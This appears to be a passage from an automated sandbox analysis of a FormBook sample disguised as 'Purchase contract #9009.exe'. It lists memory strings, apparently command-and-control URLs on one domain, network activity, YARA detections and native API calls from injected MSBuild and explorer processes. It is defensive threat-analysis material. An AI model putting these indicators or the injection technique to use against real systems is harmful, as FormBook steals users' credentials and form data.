          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/js/min.js?v2.2
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/arrow.png)
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/bodybg.png)
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/kwbg.jpg)
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/libg.png)
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/libgh.png)
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/logo.png)
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/search-icon.png)
          Source: Purchase contract #9009.exe, 00000001.00000002.667717817.0000000002951000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000005.00000000.666382323.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: Purchase contract #9009.exe, 00000001.00000003.641742892.00000000054C7000.00000004.00000001.sdmp, Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: Purchase contract #9009.exe, 00000001.00000003.641859108.00000000054C6000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: Purchase contract #9009.exe, 00000001.00000003.641859108.00000000054C6000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.como.
          Source: Purchase contract #9009.exe, 00000001.00000003.642994387.00000000054C7000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comva
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: Purchase contract #9009.exe, 00000001.00000003.644334757.00000000054FD000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: Purchase contract #9009.exe, 00000001.00000003.645950157.00000000054FD000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: Purchase contract #9009.exe, 00000001.00000003.645781018.00000000054FD000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlv
          Source: Purchase contract #9009.exe, 00000001.00000003.645715148.00000000054CB000.00000004.00000001.sdmp, Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: Purchase contract #9009.exe, 00000001.00000002.666374405.0000000000BE7000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comcea
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: Purchase contract #9009.exe, 00000001.00000003.641605989.00000000054C4000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: Purchase contract #9009.exe, 00000001.00000003.641605989.00000000054C4000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnL
          Source: Purchase contract #9009.exe, 00000001.00000003.648690279.00000000054F7000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: Purchase contract #9009.exe, 00000001.00000003.648690279.00000000054F7000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/~;
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://www.mtsnurulislamsby.com/10_Best_Mutual_Funds.cfm?fp=nC8Pk0gfsEigB97umX6ZboCBtPUHMYhCzaY6Rbgi
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://www.mtsnurulislamsby.com/Best_Penny_Stocks.cfm?fp=nC8Pk0gfsEigB97umX6ZboCBtPUHMYhCzaY6RbgieN1
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://www.mtsnurulislamsby.com/Credit_Card_Application.cfm?fp=nC8Pk0gfsEigB97umX6ZboCBtPUHMYhCzaY6R
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://www.mtsnurulislamsby.com/High_Speed_Internet.cfm?fp=nC8Pk0gfsEigB97umX6ZboCBtPUHMYhCzaY6Rbgie
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://www.mtsnurulislamsby.com/Migraine_Pain_Relief.cfm?fp=nC8Pk0gfsEigB97umX6ZboCBtPUHMYhCzaY6Rbgi
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://www.mtsnurulislamsby.com/Work_from_Home.cfm?fp=nC8Pk0gfsEigB97umX6ZboCBtPUHMYhCzaY6RbgieN12hb
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://www.mtsnurulislamsby.com/display.cfm
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://www.mtsnurulislamsby.com/fashion_trends.cfm?fp=nC8Pk0gfsEigB97umX6ZboCBtPUHMYhCzaY6RbgieN12hb
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://www.mtsnurulislamsby.com/n8ba/?3fu=S2NOBXxegNI52ult/GTqJZ9TvZOj5eG5l/LBY5m0t3ElylZ3sbPSB2bMMu
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://www.mtsnurulislamsby.com/px.js?ch=1
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://www.mtsnurulislamsby.com/px.js?ch=2
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://www.mtsnurulislamsby.com/sk-logabpstatus.php?a=eFZNZlhSdFVpS3duNGs2T2hoQ25jOWtLbFlraHVGVkFYVy
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: Purchase contract #9009.exe, 00000001.00000003.641815533.00000000054C6000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49683
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49682
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49681
          Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49682 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
          Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
          Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
          Source: unknownNetwork traffic detected: HTTP traffic on port 49681 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.904866229.0000000002EA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.904297754.00000000007A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.717327581.0000000001510000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.717304583.00000000014E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.668891023.00000000035D9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.716913702.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.904866229.0000000002EA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.904866229.0000000002EA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.904297754.00000000007A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.904297754.00000000007A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.717327581.0000000001510000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.717327581.0000000001510000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.717304583.00000000014E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.717304583.00000000014E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.668891023.00000000035D9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.668891023.00000000035D9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.716913702.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.716913702.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: Purchase contract #9009.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_004181C0 NtCreateFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00418270 NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_004182F0 NtClose,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_004183A0 NtAllocateVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0041826C NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00418215 NtCreateFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_004182EA NtClose,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E9950 NtQueueApcThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E99D0 NtCreateProcessEx,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015EB040 NtSuspendThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E9820 NtEnumerateKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E98A0 NtWriteVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E9B00 NtSetValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015EA3B0 NtGetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E9A10 NtQuerySection,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E9A80 NtOpenDirectoryObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E9560 NtWriteFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015EAD30 NtSetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E9520 NtWaitForSingleObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E95F0 NtQueryInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E9770 NtSetInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015EA770 NtOpenThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E9760 NtOpenProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015EA710 NtOpenProcessToken,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E9730 NtQueryVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E9650 NtQueryValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E9670 NtQueryInformationProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E9610 NtEnumerateValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E96D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B395D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B39540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B396E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B396D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B39660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B39650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B39780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B39FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B39710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B39860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B39840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B399A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B39910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B39A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B395F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B3AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B39520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B39560 NtWriteFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B39610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B39670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B397A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B39730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B3A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B3A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B39770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B39760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B398A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B398F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B39820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B3B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B399D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B39950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B39A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B39A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B39A10 NtQuerySection,
